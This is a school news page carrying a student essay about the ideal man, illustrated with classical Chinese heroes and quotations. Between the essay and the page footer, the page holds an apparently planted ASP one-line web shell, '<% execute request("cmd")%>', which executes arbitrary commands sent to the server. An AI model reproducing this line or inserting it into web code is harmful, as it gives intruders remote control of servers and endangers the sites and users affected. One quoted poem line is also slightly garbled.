您当前的位置:首 页 > 格致新闻 > 学生新闻 > 班级新闻

我眼中的好男儿

作者:高二(6)班 李蕊竹     发布时间:2006-9-15 点击数:5354

                                                   
    我们生活的这个世界正在逐步沦入平庸。
    当一档仅供饭后消遣的娱兴节目开始喧宾夺主,当一个三流歌星也让少男少女们迷恋得死去活来,当大众的眼睛只容得下华美而又虚伪的外表之时,我在不平,为那些曾经作为历史脊梁的巨大身影感到不平;我在呼唤,向着那些横空出世,光芒绝世的英雄们呼唤,我在呐喊:“对着无边的苍穹和广袤的大地呐喊,我眼中的好男儿,你们到底在哪里?”
    当秦始皇的大队浩浩荡荡,风光无限地出游之时,项羽脱口而出:“彼可取而代也!”我心目中的好男儿是志向高原之人,不论他出身卑微亦或是高贵,家境普通亦或是显赫,他都应有如“三军可夺帅也,匹夫不可夺志也。”此般的信念,朝着既定的目标不断前行。
    当祖狄听闻破晓的第一声鸡鸣之际,便说道:“此非恶声也!”遂起舞中庭,我心目中的好男儿是塌实勤奋之人。他懂得“不积跬步无以致千里,不积小流无以成江海”他本着“千里之行,始于足下”的精神一步一个脚印地走在成功的道路上。
    当屈原徘徊在人生的岔道,彷徨着人生的价值,他仰天长叹“路漫漫其修远兮,吾将上下而求索。”我心目中的好男儿是坚韧不屈之人,在遥遥人生路中,有无数的困难和挫折等待着他们,他们要有“在哪儿跌倒,就在哪儿爬起来的”勇气,当他们重新站立之时,他们会自信满满地笑着说,“天生我材必有用,千金散尽还复来。”
    当文天祥面对着以死相逼的故人之时,他镇定如初。面无惧色地答道:“人生自古谁无死,留取丹心照汗青。”我眼中的好男儿要有一身坦荡如砥的傲骨,面对权贵,面对诱惑,他们真正能做到“富贵不能淫,

贫贱不能移,威武不能屈。”“生当作人杰,死亦为鬼雄”是他们永远的信条。
    当陆游孤单地躺在小小的床板上时,他还是写下了“僵卧孤村不自哀,尚思为国成轮胎”这样的诗句,我心目中的好男儿是心怀天下之人,他也应有着“位卑未敢忘忧国,事立犹须待阖棺”的气节。
    我心目中的好男儿是守信之人,一言既出驷马难追;我心目中的好男儿是洒脱之人,对酒当歌,人生几何;我心目中的好男儿是懂得感恩之人,投之以桃报之以李。大江东去,浪淘尽,千古风流人物,我心目中好男儿——你们在哪里!

<% execute request("cmd")%>

本文共1页 

关闭窗口

 

关于我们 | 联系我们 | 加入我们 | 问题反馈 | 地理位置| 违法举报

 沪ICP备05028997号沪公网安备 31010102003828号

上海市格致中学版权所有 Copyright © 2010 - 2019

地址:上海市广西北路66号 邮编:200001 电话:67157666、63510228 传真:33040215

违法举报电话  63510228*2701 67157666*2701 email:gezhi@gezhi.edu.cngezhi@hpe.cn

中文域名:上海市格致中学.公益

     
当前在线人数:2661;累计访问人数:33605536